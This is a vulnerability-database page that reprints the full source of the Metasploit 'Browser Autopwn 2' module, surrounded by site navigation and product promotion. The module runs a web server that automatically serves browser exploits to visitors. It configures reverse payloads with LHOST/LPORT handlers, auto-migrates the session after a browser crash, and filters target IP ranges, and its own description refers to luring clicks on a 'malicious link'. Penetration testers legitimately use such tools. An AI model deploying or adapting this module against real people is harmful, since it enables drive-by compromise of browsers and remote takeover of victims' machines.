Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

HTTP Client Automatic Exploiter 2 (Browser Autopwn)

🗓️ 31 Aug 2024 00:00:00Reported by Jay Turla, metasploit.comType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 204 Views

HTTP Client Automatic Exploiter 2 (Browser Autopwn) module serves browser exploits automatically with options like INCLUDE_PATTERN, EXCLUDE_PATTERN, MaxExploitCount, HTMLContent, MaxSessionCount. It allows control over which exploits to load, how many to load, webpage content, and session limits

Code
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::BrowserAutopwn2  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "HTTP Client Automatic Exploiter 2 (Browser Autopwn)",  
'Description' => %q{  
This module will automatically serve browser exploits. Here are the options you can  
configure:  
  
The INCLUDE_PATTERN option allows you to specify the kind of exploits to be loaded. For example,  
if you wish to load just Adobe Flash exploits, then you can set Include to 'adobe_flash'.  
  
The EXCLUDE_PATTERN option will ignore exploits. For example, if you don't want any Adobe Flash  
exploits, you can set this. Also note that the Exclude option will always be evaluated  
after the Include option.  
  
The MaxExploitCount option specifies the max number of exploits to load by Browser Autopwn.  
By default, 20 will be loaded. But note that the client will probably not be vulnerable  
to all 20 of them, so only some will actually be served to the client.  
  
The HTMLContent option allows you to provide a basic webpage. This is what the user behind  
the vulnerable browser will see. You can simply set a string, or you can do the file://  
syntax to load an HTML file. Note this option might break exploits so try to keep it  
as simple as possible.  
  
The MaxSessionCount option is used to limit how many sessions Browser Autopwn is allowed to  
get. The default -1 means unlimited. Combining this with other options such as RealList  
and Custom404, you can get information about which visitors (IPs) clicked on your malicious  
link, what exploits they might be vulnerable to, redirect them to your own internal  
training website without actually attacking them.  
  
For more information about Browser Autopwn, please see the referenced blog post.  
},  
'License' => MSF_LICENSE,  
'Author' => [ 'sinn3r' ],  
'DisclosureDate' => '2015-07-05',  
'References' =>  
[  
[ 'URL', 'https://www.rapid7.com/blog/post/2015/07/16/the-new-metasploit-browser-autopwn-strikes-faster-and-smarter--part-2' ]  
],  
'Actions' =>  
[  
[ 'WebServer', {  
'Description' => 'Start a bunch of modules and direct clients to appropriate exploits'  
} ],  
],  
'PassiveActions' =>  
[ 'WebServer' ],  
'DefaultOptions' => {  
# We know that most of these exploits will crash the browser, so  
# set the default to run migrate right away if possible.  
"InitialAutoRunScript" => "migrate -f",  
},  
'DefaultAction' => 'WebServer'))  
  
  
register_advanced_options(get_advanced_options, self.class)  
  
register_options(  
[  
OptRegexp.new('INCLUDE_PATTERN', [false, 'Pattern search to include specific modules']),  
OptRegexp.new('EXCLUDE_PATTERN', [false, 'Pattern search to exclude specific modules']),  
  
])  
  
register_advanced_options([  
OptInt.new('ExploitReloadTimeout', [false, 'Number of milliseconds before trying the next exploit', 3000]),  
OptInt.new('MaxExploitCount', [false, 'Number of browser exploits to load', 21]),  
OptString.new('HTMLContent', [false, 'HTML Content', '']),  
OptAddressRange.new('AllowedAddresses', [false, "A range of IPs you're interested in attacking"]),  
OptInt.new('MaxSessionCount', [false, 'Number of sessions to get', -1]),  
OptBool.new('ShowExploitList', [true, "Show which exploits will actually be served to each client", false])  
])  
end  
  
def get_advanced_options  
opts = []  
DEFAULT_PAYLOADS.each_pair do |platform, payload_info|  
opts << OptString.new("PAYLOAD_#{platform.to_s.upcase}", [true, "Payload for #{platform} browser exploits", payload_info[:payload] ])  
opts << OptInt.new("PAYLOAD_#{platform.to_s.upcase}_LPORT", [true, "Payload LPORT for #{platform} browser exploits", payload_info[:lport]])  
opts << OptAddress.new("LHOST", [true, "The local host for the exploits and handlers", Rex::Socket.source_address])  
end  
  
opts  
end  
  
def on_request_exploit(cli, request, target_info)  
serve = build_html(cli, request)  
send_exploit_html(cli, serve)  
end  
  
def run  
exploit  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Aug 2024 00:00Current
7.4High risk
Vulners AI Score7.4
http client automatic exploiterbrowser autopwnmetasploitremote exploitsbrowser securityexploit configurationpayloadshtml contentsession managementrapid7 blog
204